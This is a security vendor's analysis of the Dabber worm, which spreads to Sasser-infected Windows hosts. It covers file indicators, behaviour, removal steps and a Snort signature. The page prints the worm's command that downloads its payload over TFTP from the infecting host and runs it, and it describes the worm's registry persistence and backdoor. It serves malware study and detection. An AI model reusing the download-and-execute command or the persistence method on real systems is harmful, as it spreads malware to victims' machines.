Research

Dabber Worm Analysis

SecureWorks' research team has discovered a new worm exploiting a vulnerability in the FTP server component of the Sasser worm. This worm will only infect users already infected by Sasser. Even though we have seen worms utilize backdoors left behind by other worms, this is the first time we have seen a worm using a vulnerability in another worm in order to propagate. We have named this worm "Dabber".

Update: May 14, 2004

Third party analysis has indicated that Dabber is related to the Doomran worm discovered in March. Doomran had a similar method of operation, infecting hosts through the backdoor left by the Mydoom email virus, however it merely utilized the Mydoom backdoor protocol instead of exploiting a vulnerability. It is likely that much of the worm code was reused by the author to create Dabber, substituting the Sasser-FTP exploit for the Mydoom backdoor upload code and adding the ability to remove Sasser.

Correlations between scans on port 3127 (Mydoom backdoor) and port 9898 (Dabber/Doomran backdoor) were made as early as February, but due to no complete analyses of Doomran being available, the connection between the port 9898 activity and Doomran was not established until now.

File Details

Name: package.exe
Size: 29,696 bytes
MD5: 149dd119425ec801fbca6237413db631
PE compile time: Wed May 12 00:46:01 2004

The worm incorporates code from the Sasser-FTP exploit recently released by "mandragore" of the Romanian Security Research team. The worm scans for Sasser-infected hosts on port 5554. When it finds one, it uses the exploit to temporarily bind a Windows command shell to port 8967. The worm then connects to the victim host on that port and issues the following command:

tftp -i [infecting host ip] GET hello.all package.exe & package.exe & exit

The worm has a TFTP server built-in to transfer the executable file of the worm to the target system. When the command above runs, a file "package.exe" will be copied to the victim system and executed.

When executed, the worm takes the following steps:

  • Copies itself to Startup folders and the Windows system directory.
  • Creates a mutex named "sas4dab" to ensure only one worm process runs in memory.
  • Installs a registry key to run at boot:

    In SOFTWARE\Microsoft\Windows\CurrentVersion\Run: 

    	sassfix -> %WINDIR%\package.exe
  • Deletes a list of registry keys of Sasser and other viruses:

    From SOFTWARE\Microsoft\Windows\CurrentVersion\Run: 

    CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
Gremlin
Taskmon
Video
avserve
avvserrve32
avserve2.exe
lsasss.exe
lsasss
ssgrate.exe
ssgrate
drvsys.exe
drvsys
drvsys
Drvddll_exe
Drvddll_exe
Drvddll.exe
Drvddll.exe
Microsoft Update
windows
Windows Drive Compatibility
Generic Host Service
skynetave.exe
navapsrc.exe
lsasss.exe
drvddll.exe
ssgrate.exe
WinMsrv32
soundcontrl
System Updater Service
BagleAV
MapiDrv
SkynetRevenge
TempCom
Video Process
Window
Microsoft Update
windows
Windows Drive Compatibility
Generic Host Service
skynetave.exe
navapsrc.exe
lsasss.exe
drvddll.exe
ssgrate.exe
WinMsrv32
soundcontrl
System Updater Service
BagleAV
MapiDrv
SkynetRevenge
TempCom
Video Process
Window
Microsoft Update
    From SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices: 
    windows
Windows Drive Compatibility
Generic Host Service
skynetave.exe
navapsrc.exe
lsasss.exe
drvddll.exe
ssgrate.exe
WinMsrv32
soundcontrl
System Updater Service
BagleAV
MapiDrv
SkynetRevenge
TempCom
Video Process
Window
  • Sets up a TFTP server used to transfer the worm code to target systems
  • Sets up a backdoor listener on TCP port 9898. An authenticated backdoor user can download additional code, execute processes on the infected system and get statistics about how many additional hosts have been infected by the local worm process.

From a network standpoint, the exploit process will look slightly different than interactive runs of the exploit code - the worm will connect to port 5554 and send a single byte (an ascii "C"). If that connection is successful, it will reconnect to port 5554 and send the exploit. After the exploit has been sent the worm will attempt to connect to port 9898 on the target host in order to confirm the infection was successful, again sending an ascii "C". If the connection to port 9898 is successful, an internal tally is incremented, presumably so statistics can be retrieved from the backdoor at a later time. Sequential scans on port 5554 and 9898 are an indicator of an infection.

Removal

Kill the package.exe process using the Windows Task Manager. Remove the "sassfix" registry key. Delete package.exe from the Windows system directory and all startup folders.

Snort Signatures

The following Snort signature can detect the exploit used by the worm:

alert tcp any any -> any 5554 (msg:"Sasser FTP exploit attempt"; flow:to_server,established; content:"PORT "; depth:5; dsize:>150; classtype:attempted-admin; reference:url,www.secureworks.com/research/threats/dabber; sid:1000105; rev:1;)

Join Newsletter